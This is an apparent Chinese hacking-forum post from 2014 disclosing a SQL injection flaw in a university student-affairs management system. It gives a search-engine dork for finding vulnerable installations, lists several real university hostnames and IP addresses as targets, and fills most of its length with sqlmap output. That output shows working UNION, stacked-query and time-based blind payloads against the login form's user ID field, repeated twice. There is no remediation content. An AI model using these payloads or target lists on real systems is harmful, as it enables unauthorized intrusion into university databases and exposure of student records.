某高校管理系统存在通用型SQL注入漏洞下载

来源：黑吧安全网　浏览：557次　时间：2014-06-27

某高校管理系统存在通用型SQL注入漏洞

西安奥达软件工程有限公司旗下高校学生工作管理系统前台及后台均存在注入漏洞

1、高校学生工作管理系统前台

intitle:学生工作管理系统 Login/List.aspx?ID=

http://202.117.112.29/login/List.aspx?ID=10

http://xg.chd.edu.cn/Login/List.aspx?ID=99

http://xg.snnu.edu.cn/Login/List.aspx?ID=99

http://202.200.16.19/login/List.aspx?ID=99

http://202.200.168.108/Login/List.aspx?ID=99

以http://xg.snnu.edu.cn/Login/List.aspx?ID=99为例

sqlmap identified the following injection points with a total of 100 HTTP(s) requests:

---

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登录

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登录

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登录

---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: txtUserId

Type: UNION query

Title: Generic UNION query (NULL) - 6 columns

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登录

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登录